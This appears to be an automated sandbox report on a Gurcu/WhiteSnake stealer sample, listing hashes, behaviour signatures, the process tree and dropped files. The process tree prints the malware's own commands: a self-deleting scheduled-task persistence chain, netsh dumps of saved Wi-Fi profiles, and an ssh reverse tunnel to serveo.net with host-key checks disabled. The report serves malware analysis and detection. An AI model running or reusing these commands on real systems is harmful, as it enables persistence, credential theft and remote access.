Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    05-10-2023 21:53

General

  • Target

    1edb8aa1adacda31bc98064b1634ddea.exe

  • Size

    225KB

  • MD5

    1edb8aa1adacda31bc98064b1634ddea

  • SHA1

    7dc5aee1dd577b61a41a5001d465f0606bb33618

  • SHA256

    fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

  • SHA512

    26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

  • SSDEEP

    3072:GQ2NGV19gqU3pJpfYTCOoShKmECPTKBWFPkl6WQre9Q29bSHXGhrD9HA2AF+q73o:uGDCOoSEmkWeILe9z9bS30AzHe0

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 8 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe
    "C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2204
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2232
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:3068
        • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2684
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:2612
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:2788
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:2492
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1700
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:1116
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:312
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:808
                      • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                        "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8262 serveo.net
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2916
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {7D241C9B-9E8B-4E2A-8FD0-6DB944CFF4FE} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:764
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
                    C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
                    2⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:1640
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1868
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        4⤵
                          PID:2052
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          4⤵
                            PID:1332
                          • C:\Windows\system32\findstr.exe
                            findstr /R /C:"[ ]:[ ]"
                            4⤵
                              PID:1932
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1112
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              4⤵
                                PID:2224
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show networks mode=bssid
                                4⤵
                                  PID:2232
                                • C:\Windows\system32\findstr.exe
                                  findstr "SSID BSSID Signal"
                                  4⤵
                                    PID:1900
                                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                                  "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8262 serveo.net
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2628

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\.ssh\known_hosts

                              Filesize

                              393B

                              MD5

                              18015a60cd12f33648facec1263cfafa

                              SHA1

                              31b7afd9a2dc51bfad694e5772d430fceedbac3f

                              SHA256

                              9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190

                              SHA512

                              fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                              Filesize

                              225KB

                              MD5

                              1edb8aa1adacda31bc98064b1634ddea

                              SHA1

                              7dc5aee1dd577b61a41a5001d465f0606bb33618

                              SHA256

                              fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                              SHA512

                              26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                              Filesize

                              225KB

                              MD5

                              1edb8aa1adacda31bc98064b1634ddea

                              SHA1

                              7dc5aee1dd577b61a41a5001d465f0606bb33618

                              SHA256

                              fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                              SHA512

                              26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                              Filesize

                              225KB

                              MD5

                              1edb8aa1adacda31bc98064b1634ddea

                              SHA1

                              7dc5aee1dd577b61a41a5001d465f0606bb33618

                              SHA256

                              fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                              SHA512

                              26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\loshoa0u2z\port.dat

                              Filesize

                              4B

                              MD5

                              35bf98501edec1431e0c2fabe948da66

                              SHA1

                              981d146bc84630d28b0e2b894e6924b3bfc9dd62

                              SHA256

                              26480e3574424293795346425b6e91093c3d11c77614386a34f412c090859e38

                              SHA512

                              0fee6bfd35552d85af5a6100f7d10be69c377df413d126652800d952e0119fa22e89620d534259cdd52465f641404d8d416d131c5c4f90a18782c78e93cbb8c4

                            • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • memory/1640-129-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/1640-131-0x0000000002230000-0x00000000022B0000-memory.dmp

                              Filesize

                              512KB

                            • memory/1640-136-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2180-2-0x000000001B3F0000-0x000000001B470000-memory.dmp

                              Filesize

                              512KB

                            • memory/2180-5-0x000007FEF5A30000-0x000007FEF641C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2180-0-0x0000000000D00000-0x0000000000D3E000-memory.dmp

                              Filesize

                              248KB

                            • memory/2180-1-0x000007FEF5A30000-0x000007FEF641C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2640-11-0x000000001B420000-0x000000001B4A0000-memory.dmp

                              Filesize

                              512KB

                            • memory/2640-126-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2640-127-0x000000001B420000-0x000000001B4A0000-memory.dmp

                              Filesize

                              512KB

                            • memory/2640-10-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2640-9-0x0000000000A30000-0x0000000000A6E000-memory.dmp

                              Filesize

                              248KB